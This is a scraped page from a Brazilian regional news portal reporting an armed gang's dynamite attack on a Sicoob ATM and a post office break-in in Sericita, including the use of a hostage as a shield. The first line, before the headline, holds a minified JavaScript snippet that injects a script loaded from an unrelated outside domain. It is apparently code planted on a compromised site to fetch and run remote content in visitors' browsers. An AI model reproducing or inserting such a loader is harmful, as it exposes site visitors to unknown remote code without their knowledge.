;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Quadrilha arromba Sicoob e Correios em Sericita - Seis homens encapuzados; vítima foi usada como escudo. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Quadrilha arromba Sicoob e Correios em Sericita – Seis homens encapuzados; vítima foi usada como escudo.

Durante a madrugada desta quinta-feira(05/03), por volta das 02 horas, seis homens fortemente armados efetuaram vários disparos no centro da cidade de Sericita e explodiram o caixa eletrônico do Sicoob. Bandidos ainda arrombaram a agência dos Correios. Eles fugiram em veículo Saveiro, preto, modelo geração 5, em direção a cidade de Jequeri.
Segundo as primeiras informações da Polícia Militar e relatos de moradores, a ação da quadrilha foi muito violenta. Os autores chegaram na cidade a 1:52 da manhã. Eram seis homens encapuzados: cinco estava em cima de uma capota marítima de uma Saveiro, preta. Pararam em frente a agência e retiraram uma pessoa de dentro da carroceria. A vítima foi usada como escudo por um homem com uma espingarda calibre 12, enquanto os demais autores portavam revólveres, pistola e outra espingarda.
Os bandidos quebraram a porta blindex com uma marreta e colocaram dinamite num dos caixas eletrônicos. Conseguiram explodir, mas não tiveram acesso ao dinheiro. Mesmo assim furtaram da agência dois revólveres, dois coletes à prova de bala e 22 cartuchos calibre 38.
Foram até a agência do Correios e também arrombaram. Até o momento não se sabe o que levaram do Correios.
A ação do grupo foi planejada. Antes desses delitos, eles retiraram as baterias e cabos de energia da torre de celular da cidade, fazendo com que Sericita ficasse sem celular e que o sistema de alarme do banco não conseguisse enviar mensagem do roubo para a empresa de segurança e a polícia.
Após toda a ação, os bandidos fugiram em direção à cidade de Jequeri, pela zona rural.
RELATOS
Nas redes sociais, moradores relataram assustados o que aconteceu. “Escutei daqui de casa os estouros, mas nem tive coragem de sair. Estou super nervosa”, detalhou uma moradora. Outro conta que os bandidos passaram na rua atirando para o alto.
A atitude dos bandidos foi justamente para intimidar a comunidade e evitar reações. O homem feito refém estava na praça da cidade.

Informação e fotos:Portal Caparao/www.portalcaparao.com.br

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.